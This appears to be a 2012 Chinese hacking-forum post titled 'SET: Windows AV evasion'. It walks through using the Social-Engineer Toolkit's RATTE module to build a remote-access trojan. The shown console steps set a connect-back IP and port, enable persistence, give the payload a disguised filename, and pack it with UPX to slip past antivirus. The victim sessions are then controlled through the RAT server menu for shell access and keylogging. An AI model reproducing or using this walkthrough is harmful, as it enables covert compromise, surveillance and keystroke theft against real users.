切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
224 set : windows 免杀[复制链接]
发表于 2012-8-25 17:42:59 | 显示全部楼层 |!read_mode!
启动SET
3) Third Party Modules

  1. set> 3


  2.   [-] Social-Engineer Toolkit Third Party Modules menu.
  3.   [-] Please read the readme/modules.txt for information on how to create your own modules.

  4.   1.  RATTE (Remote Administration Tool Tommy Edition) Create Payload only. Read the readme/RATTE-Readme.txt first
  5.   2.  RATTE Java Applet Attack (Remote Administration Tool Tommy Edition) - Read the readme/RATTE_README.txt first

  6.   99. Return to the previous menu

  7. set:modules>
复制代码

选择 1 或者 2, 2是JAVA

  1. set:modules>1
  2. set:modules:webattack> Enter the IP address to connect back on:5.5.5.2 #监听IP
  3. set:modules:webattack> Port RATTE Server should listen on [8080]:9741 # 监听端口
  4. set:modules:webattack> Should RATTE be persistent [no|yes]?:yes  #persistent 模块 VBS http://d.fuzzexp.org/?p=13#toc-persistence
  5. set:modules:webattack> Use specifix filename (ex. firefox.exe) [filename.exe or empty]?:dir.exe  #名字
  6. [-] preparing RATTE...
  7. [*] Payload has been exported to src/program_junk/ratteM.exe
  8. set:modules:webattack> Start the ratteserver listener now [yes|no]:yes
  9. [-] Starting ratteserver...
  10. Welcome to RATTE
  11. RATTE is published for education only!
  12. Use only with written permission of target!
  13. For more technical information and parts of source code
  14. check out chapter "B.2 Entwicklung eines Sicherheitspruefprogrammes"
  15. of "Die Kunst der digitalen Verteidigung"
  16. -> http://www.cul.de/verteidigung.html
  17. RATTE Server Menue
  18. 1) list clients
  19. 2) activate client
  20. 3) remove client
  21. 4) remove all clients
  22. 5) remove&delete Client
  23. 99) stop Server
  24. Choose:
复制代码

保存到了这里
  • Payload has been exported to src/program_junk/ratteM.exe
    压缩一下:

    1. root@Dis9Team:/pen/set/src/program_junk# upx ratteM.exe
    复制代码




    运行之后

    1. RATTE Server Menue
    2. 1) list clients  #查看会话
    3. 2) activate client  # 连接会话
    4. 3) remove client  # 删除
    5. 4) remove all clients #删除全部
    6. 5) remove&delete Client
    7. 99) stop Server
    复制代码
    1. 选择2) activate client

    2. 然后输入会话ID 进行一些操作 CMD 键盘记录
    复制代码




  • 附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
    操千曲而后晓声,观千剑而后识器。

    代码区

    GMT+8, 2020-9-29 10:15

    Powered by Discuz! X2

    © 2001-2018 Comsenz Inc.

    回顶部